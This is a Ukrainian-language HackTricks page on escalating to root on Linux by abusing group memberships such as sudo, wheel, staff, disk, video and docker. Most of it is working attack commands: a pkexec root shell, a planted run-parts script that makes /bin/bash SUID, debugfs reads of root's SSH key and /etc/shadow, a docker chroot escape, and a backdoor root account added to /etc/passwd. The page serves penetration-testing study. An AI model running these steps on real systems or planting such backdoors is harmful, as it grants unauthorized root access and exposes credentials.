Цікаві Групи - Linux Privesc
Reading time: 10 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Sudo/Admin Групи
PE - Метод 1
Іноді, за замовчуванням (або через те, що деяке програмне забезпечення цього потребує) всередині файлу /etc/sudoers ви можете знайти деякі з цих рядків:
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
Це означає, що будь-який користувач, який належить до групи sudo або admin, може виконувати будь-що як sudo.
Якщо це так, щоб стати root, ви можете просто виконати:
sudo su
PE - Метод 2
Знайдіть всі suid бінарні файли та перевірте, чи є бінарний файл Pkexec:
find / -perm -4000 2>/dev/null
Якщо ви виявите, що бінарний файл pkexec є SUID бінарним файлом і ви належите до sudo або admin, ви, ймовірно, зможете виконувати бінарні файли як sudo, використовуючи pkexec
.
Це пов'язано з тим, що зазвичай це групи всередині політики polkit. Ця політика в основному визначає, які групи можуть використовувати pkexec
. Перевірте це за допомогою:
cat /etc/polkit-1/localauthority.conf.d/*
Там ви знайдете, які групи мають право виконувати pkexec, і за замовчуванням в деяких дистрибутивах Linux з'являються групи sudo та admin.
Щоб стати root, ви можете виконати:
pkexec "/bin/sh" #You will be prompted for your user password
Якщо ви намагаєтеся виконати pkexec і отримуєте цю помилку:
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
Це не тому, що у вас немає дозволів, а тому, що ви не підключені без GUI. І є обхідний шлях для цієї проблеми тут: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903. Вам потрібно 2 різні ssh сесії:
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
Wheel Group
Іноді, за замовчуванням у файлі /etc/sudoers ви можете знайти цей рядок:
%wheel ALL=(ALL:ALL) ALL
Це означає, що будь-який користувач, який належить до групи wheel, може виконувати будь-що як sudo.
Якщо це так, щоб стати root, ви можете просто виконати:
sudo su
Shadow Group
Користувачі з групи shadow можуть читати файл /etc/shadow:
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
Так що, прочитайте файл і спробуйте зламати деякі хеші.
Група співробітників
staff: Дозволяє користувачам додавати локальні модифікації до системи (/usr/local
), не потребуючи прав root (зауважте, що виконувані файли в /usr/local/bin
знаходяться в змінній PATH будь-якого користувача, і вони можуть "перекривати" виконувані файли в /bin
і /usr/bin
з такою ж назвою). Порівняйте з групою "adm", яка більше пов'язана з моніторингом/безпекою. [source]
У дистрибутивах debian змінна $PATH
показує, що /usr/local/
буде виконуватися з найвищим пріоритетом, незалежно від того, чи є ви привілейованим користувачем чи ні.
$ echo $PATH
/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Якщо ми зможемо захопити деякі програми в /usr/local
, ми зможемо легко отримати root.
Захоплення програми run-parts
є простим способом отримати root, оскільки більшість програм запускають run-parts
, як (crontab, при вході через ssh).
$ cat /etc/crontab | grep run-parts
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
або Коли нова сесія ssh входу.
$ pspy64
2024/02/01 22:02:08 CMD: UID=0 PID=1 | init [2]
2024/02/01 22:02:10 CMD: UID=0 PID=17883 | sshd: [accepted]
2024/02/01 22:02:10 CMD: UID=0 PID=17884 | sshd: [accepted]
2024/02/01 22:02:14 CMD: UID=0 PID=17886 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2024/02/01 22:02:14 CMD: UID=0 PID=17887 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2024/02/01 22:02:14 CMD: UID=0 PID=17888 | run-parts --lsbsysinit /etc/update-motd.d
2024/02/01 22:02:14 CMD: UID=0 PID=17889 | uname -rnsom
2024/02/01 22:02:14 CMD: UID=0 PID=17890 | sshd: mane [priv]
2024/02/01 22:02:15 CMD: UID=0 PID=17891 | -bash
Експлуатація
# 0x1 Add a run-parts script in /usr/local/bin/
$ vi /usr/local/bin/run-parts
#! /bin/bash
chmod 4777 /bin/bash
# 0x2 Don't forget to add a execute permission
$ chmod +x /usr/local/bin/run-parts
# 0x3 start a new ssh sesstion to trigger the run-parts program
# 0x4 check premission for `u+s`
$ ls -la /bin/bash
-rwsrwxrwx 1 root root 1099016 May 15 2017 /bin/bash
# 0x5 root it
$ /bin/bash -p
Disk Group
Ця привілегія майже еквівалентна доступу root, оскільки ви можете отримати доступ до всіх даних всередині машини.
Files:/dev/sd[a-z][1-9]
df -h #Find where "/" is mounted
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
Зверніть увагу, що за допомогою debugfs ви також можете записувати файли. Наприклад, щоб скопіювати /tmp/asd1.txt
до /tmp/asd2.txt
, ви можете зробити:
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
Однак, якщо ви спробуєте записати файли, що належать root (як /etc/shadow
або /etc/passwd
), ви отримаєте помилку "Доступ заборонено".
Video Group
Використовуючи команду w
, ви можете дізнатися хто увійшов в систему і вона покаже вихід, подібний до наступного:
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
tty1 означає, що користувач yossi фізично увійшов до терміналу на машині.
Група video має доступ до перегляду виходу екрану. В основному, ви можете спостерігати за екранами. Для цього вам потрібно захопити поточне зображення на екрані в сирих даних і отримати роздільну здатність, яку використовує екран. Дані екрану можна зберегти в /dev/fb0
, а роздільну здатність цього екрану можна знайти в /sys/class/graphics/fb0/virtual_size
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
Щоб відкрити сирий образ, ви можете використовувати GIMP, вибрати файл **screen.raw
** і вибрати тип файлу Сирі дані зображення:
Потім змініть Ширину та Висоту на ті, що використовуються на екрані, і перевірте різні Типи зображень (і виберіть той, який найкраще відображає екран):
Група Root
Схоже, що за замовчуванням учасники групи root можуть мати доступ до модифікації деяких конфігураційних файлів сервісів або деяких файлів бібліотек або інших цікавих речей, які можуть бути використані для ескалації привілеїв...
Перевірте, які файли учасники root можуть модифікувати:
find / -group root -perm -g=w 2>/dev/null
Docker Group
Ви можете монтувати кореневу файлову систему хост-машини до обсягу екземпляра, тому, коли екземпляр запускається, він негайно завантажує chroot
у цей обсяг. Це фактично надає вам root на машині.
docker image #Get images from the docker service
#Get a shell inside a docker container with access as root to the filesystem
docker run -it --rm -v /:/mnt <imagename> chroot /mnt bash
#If you want full access from the host, create a backdoor in the passwd file
echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/passwd
#Ifyou just want filesystem and network access you can startthe following container:
docker run --rm -it --pid=host --net=host --privileged -v /:/mnt <imagename> chroot /mnt bashbash
Нарешті, якщо вам не подобаються жодні з попередніх пропозицій або вони не працюють з якоїсь причини (docker api firewall?), ви завжди можете спробувати запустити привілейований контейнер і втекти з нього, як пояснено тут:
Якщо у вас є права на запис над сокетом docker, прочитайте цей пост про те, як підвищити привілеї, зловживаючи сокетом docker.
GitHub - KrustyHack/docker-privilege-escalation: A docker example for privilege escalation
Privilege escalation via Docker - Chris Foster
Група lxc/lxd
Interesting Groups - Linux Privesc
Група Adm
Зазвичай члени групи adm
мають права на читання файлів журналів, розташованих у /var/log/.
Отже, якщо ви скомпрометували користувача в цій групі, вам обов'язково слід переглянути журнали.
Група Auth
У OpenBSD група auth зазвичай може записувати в папки /etc/skey і /var/db/yubikey, якщо вони використовуються.
Ці права можуть бути зловжиті за допомогою наступного експлойту для підвищення привілеїв до root: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.